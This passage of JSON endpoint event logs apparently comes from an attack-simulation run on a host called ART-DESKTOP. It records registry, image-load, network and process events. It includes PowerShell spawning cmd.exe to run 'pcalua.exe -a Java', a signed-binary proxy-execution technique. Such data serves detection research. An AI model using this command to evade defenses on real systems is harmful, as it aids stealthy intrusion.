"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": 
"Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977300000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Windows.Media.Devices.dll", - "image_path": "C:\\Windows\\System32\\Windows.Media.Devices.dll", - "pid": 6784, - "process_name": "audiodg.exe", - "process_path": "C:\\Windows\\System32\\audiodg.exe", - "timestamp": 131883573976990000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-001022335701}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573977330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573977330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573977330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573977330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "destination_address": "0:0:0:0:0:0:0:1", - "destination_port": "135", - "event_type": "network", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "protocol": "tcp", - "source_address": "0:0:0:0:0:0:0:1", - "source_port": "50509", - "subtype": "outgoing", - "timestamp": 131883573971910000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "destination_address": "0:0:0:0:0:0:0:1", - "destination_port": "50509", - "event_type": "network", - "pid": 928, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "tcp", - 
"source_address": "0:0:0:0:0:0:0:1", - "source_port": "135", - "subtype": "incoming", - "timestamp": 131883573971920000, - "unique_pid": "{42FC7E13-B293-5C05-0000-001038180100}", - "user": "NT AUTHORITY\\NETWORK SERVICE", - "user_domain": "NT AUTHORITY", - "user_name": "NETWORK SERVICE" - }, - { - "destination_address": "0:0:0:0:0:0:0:1", - "destination_port": "49667", - "event_type": "network", - "pid": 2812, - "process_name": "schtasks.exe", - "process_path": "C:\\Windows\\System32\\schtasks.exe", - "protocol": "tcp", - "source_address": "0:0:0:0:0:0:0:1", - "source_port": "50510", - "subtype": "outgoing", - "timestamp": 131883573971940000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010A0115701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "destination_address": "0:0:0:0:0:0:0:1", - "destination_port": "50510", - "event_type": "network", - "pid": 1408, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "protocol": "tcp", - "source_address": "0:0:0:0:0:0:0:1", - "source_port": "49667", - "subtype": "incoming", - "timestamp": 131883573971940000, - "unique_pid": "{42FC7E13-B2A1-5C05-0000-00103C650100}", - "user": "NT AUTHORITY\\SYSTEM", - "user_domain": "NT AUTHORITY", - "user_name": "SYSTEM" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", - "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - "registry_value": "Journal", - "timestamp": 131883573997490000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 2136, - "process_name": "svchost.exe", - "process_path": "C:\\WINDOWS\\System32\\svchost.exe", - "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", - 
"registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", - "registry_value": "Render", - "timestamp": 131883573997490000, - "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574007050000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\W32:000000000008056A", - "registry_value": "W32:000000000008056A", - "timestamp": 131883574007350000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "terminate", - "timestamp": 131883574007350000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 2036, - "process_name": "pcalua.exe", - "process_path": "C:\\WINDOWS\\system32\\pcalua.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": 
"HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574007350000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010CF1E5701}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", - "registry_value": "Locales", - "timestamp": 131883574007350000, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", - "registry_value": "cbjrefuryy.rkr", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", - "registry_path": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", - "registry_value": "HRZR_PGYFRFFVBA", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM", - "registry_path": "HKLM\\SOFTWARE", - "registry_value": "SOFTWARE", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE", - "registry_path": "HKLM\\SOFTWARE\\Microsoft", - "registry_value": "Microsoft", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 4516, - "process_name": "ctfmon.exe", - "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", - "registry_value": "Input", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" - }, - { - "event_type": "registry", - "pid": 5824, - "process_name": "SearchIndexer.exe", - "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", - "registry_value": "NewClientID", - "timestamp": 131883574007520016, - "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" - }, - { - "event_type": "registry", - "pid": 4744, - "process_name": "Explorer.EXE", - "process_path": "C:\\WINDOWS\\Explorer.EXE", - "registry_key": 
"HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", - "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" - }, - { - "event_type": "process", - "pid": 7004, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC15-5C05-0000-0010C81D5701}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"pcalua.exe -a Java\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7060, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883574007730000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - 
{ - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "event_type": "file", - "file_name": "PCALUA.EXE-5EB8CBC1.pf", - "file_path": "C:\\Windows\\Prefetch\\PCALUA.EXE-5EB8CBC1.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883574007670000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 7060, - "process_name": "cmd.exe", - "process_path": "C:\\WINDOWS\\system32\\cmd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\bam\\UserSettings\\S-1-5-21-2047549730-3016700585-885829632-1000\\\\Device\\HarddiskVolume1\\Windows\\System32\\pcalua.exe", - "registry_value": "pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010D2505701}" - }, - { - "command_line": "pcalua.exe -a Java", - "event_type": "process", - "logon_id": 217055, - 
"parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5020, - "ppid": 7060, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "subtype": "create", - "timestamp": 131883574007840000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}", - "unique_ppid": "{42FC7E13-CC18-5C05-0000-0010D2505701}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "pcalua.exe", - "image_path": "C:\\Windows\\System32\\pcalua.exe", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 
131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - 
"event_type": "image_load", - "image_name": "shell32.dll", - "image_path": "C:\\Windows\\System32\\shell32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "cfgmgr32.dll", - "image_path": "C:\\Windows\\System32\\cfgmgr32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "SHCore.dll", - "image_path": "C:\\Windows\\System32\\SHCore.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": "C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "windows.storage.dll", - 
"image_path": "C:\\Windows\\System32\\windows.storage.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "shlwapi.dll", - "image_path": "C:\\Windows\\System32\\shlwapi.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "kernel.appcore.dll", - "image_path": "C:\\Windows\\System32\\kernel.appcore.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "profapi.dll", - "image_path": "C:\\Windows\\System32\\profapi.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "powrprof.dll", - "image_path": "C:\\Windows\\System32\\powrprof.dll", - "pid": 
5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "fltLib.dll", - "image_path": "C:\\Windows\\System32\\fltLib.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007830016, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "pcaui.dll", - "image_path": "C:\\Windows\\System32\\pcaui.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "oleaut32.dll", - "image_path": "C:\\Windows\\System32\\oleaut32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "apphelp.dll", - "image_path": "C:\\Windows\\System32\\apphelp.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "comctl32.dll", - "image_path": "C:\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.17134.441_none_fb3e9b173068fb23\\comctl32.dll", - "pid": 5020, - "process_name": "pcalua.exe", - "process_path": "C:\\Windows\\System32\\pcalua.exe", - "timestamp": 131883574007980000, - "unique_pid": "{42FC7E13-CC18-5C05-0000-0010E4515701}" - }, - { - "event_type": "image_load", - "image_name": "dui70.dll", - "image_path": "C:\\Windows\\System32\\dui70.dll", - "pid": 5020, 
